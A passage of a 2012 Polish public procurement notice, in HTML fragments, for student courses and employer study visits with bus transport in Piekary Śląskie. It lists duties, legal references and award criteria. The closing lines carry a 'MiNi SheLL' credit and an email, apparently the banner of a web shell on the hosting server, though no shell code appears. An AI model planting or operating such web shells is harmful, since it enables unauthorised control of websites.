Zamawiający dostarczy Wykonawcy 3 dni po podpisaniu umowy listę uczniów, którzy będą uczęszczać w kursie oraz wzory dokumentów projektowych, tj. wzór listy obecności oraz wzór dziennika kursu.

W terminie do 5 dnia kalendarzowych od podpisania umowy Wykonawca przekaże Zamawiającemu do Biura Projektu harmonogram kursu. W terminie do 3 dni po zakończeniu ostatnich zajęć kursu Wykonawca przekaże Zamawiającemu dziennik kursu. Kurs odbywać się będzie według harmonogramu, zaakceptowanego przez Koordynatora Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie wizyt studyjnych u pracodawców dla 75 uczniów w okresie od 20 czerwca do 6 lipca 2012 roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wizyty studyjne powinny się odbywać w 4 grupach z zapewnioną opieką (2 opiekunów dla jednej grupy) oraz zorganizowanym transportem (autokarem lub busem) dla uczestników wizyty studyjnej do miejsca wizyty studyjnej z miasta Piekary Śląskie oraz z miejsca wizyty studyjnej do miasta Piekary Śląskie. 

Miejsce zbiórki dla 2 wizyt studyjnych odbędzie się: przy ulicy M. Skłodowskiej - Curie 49 w Piekarach Śląskich, dla 2 wizyt studyjnych odbędzie się: przy ulicy Bytomskiej 207 w Piekarach Śląskich.

Wizyty studyjne powinny odbywać się na terenie województwa śląskiego i trwać min. 5 godzin zegarowych. Organizator wizyt studyjnych powinien posiadać aktualne ubezpieczenie organizatora od odpowiedzialności cywilnej za ewentualne szkody powstałe przez uczniów w miejscu wizyty studyjnej.

Celem wizyt studyjnych jest m.in. zaznajomienie się uczniów ze specyfiką pracy w danym zawodzie oraz nawiązanie kontaktu uczniów z pracodawcą.

Wizyty studyjne powinny odbyć się u pracodawców w następujących branżach:

informatyczno-elektroniczna - 1 grupa (33 uczniów) w zakładzie zatrudniającym min. 20 osób.
ekonomiczna - 1 grupa  (11 uczniów) w zakładzie zatrudniającym min. 20 osób.
gastronomiczna (piekarz, cukiernik, kucharz) - 1 grupa (11 uczniów) w hotelu zatrudniającym min. 20 osób, działającym od min. 3 lat w województwie śląskim.
mechaniczna (blacharz/lakiernik/mechanik samochodowy) - 1 grupa (20 osób) w zakładzie zatrudniającym min. 40 osób.

Wizyty studyjne muszą odbywać się według programu wizyty studyjnej (dla każdej  branży z osobna) przedstawionego przez Wykonawcę i zaakceptowanego przez Biuro Projektu oraz Kierownika Szkolenia Praktycznego Zespołu Szkół nr 1 oraz Zasadniczej Szkoły Zawodowej.

Oferowana cena wizyt studyjnych musi zawierać:
organizację wizyt studyjnych;
wynagrodzenie dla opiekunów wizyt studyjnych;
zorganizowany transport.

Niezwłocznie po podpisaniu umowy Zamawiający przekaże Wykonawcy listę uczniów, którzy będą uczestniczyć w wizycie studyjnej, wzór listy obecności. W następnym dniu roboczym od przekazania przez Zamawiającego dokumentów (tj. lista uczniów uczestniczących w wizycie studyjnej, proponowany termin rozpoczęcia wizyty studyjnej) Wykonawca przekaże Zamawiającemu do Biura Projektu harmonogram wizyt studyjnych.

Wykonawca zapewnia sprawne technicznie środki transportu do wykonywania przewozów, spełniające wymagania opisane w SIWZ, wymagania techniczne określone przepisami prawa, posiadające aktualne ubezpieczenie OC i NNW.

Wykonawca zapewni wykwalifikowanych kierowców, posiadających stosowne uprawnienia do kierowania pojazdami silnikowymi oraz spełniających wymagania określone w przepisach ustawy z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym tj. Dz. U. z 2005 r. Nr 108, poz. 908, Ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz.U. z 2007 r. Nr 125, poz. 874, z późn. zm.).
 
Wykonawca odpowiada za sprawność techniczną pojazdów służących do wykonania usług stanowiących przedmiot zamówienia. Zamawiający wymaga, aby pojazdy służące do wykonania usług spełniały wszelkie wymagania techniczne i bezpieczeństwa zgodnie z obowiązującymi przepisami prawa.
 
Wykonawca będzie zobowiązany do:
a) podstawienia, zgodnie ze zleceniem pojazdu wraz z kierowcą,
b) telefonicznego informowania Zamawiającego o każdym opóźnieniu powyżej 15 minut
w podstawieniu pojazdu. Brak informacji będzie traktowany jak nie podstawienie pojazdu i będzie skutkował naliczeniem kary umownej w wysokości 100% przewidzianego wynagrodzenia,
d) każdorazowego ustalenia trzeźwości kierującego pojazdem, a w przypadku
stwierdzenia, że stan kierowcy wskazuje na spożycie alkoholu lub środków odurzających, odsunięcia go od wykonywania pracy.
 
Wykonawca zobowiązany jest do spełnienia wszelkich warunków wynikających z przepisów ustawy z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym tj. Dz. U. z 2005 r. Nr 108, poz. 908, Ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2007 r. Nr 125, poz. 874, z późn. zm.) oraz Ustawy z dnia 15 listopada 1984 r. Prawo przewozowe (tj. Dz. U. z 2000 r. Nr 50, poz. 601, z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com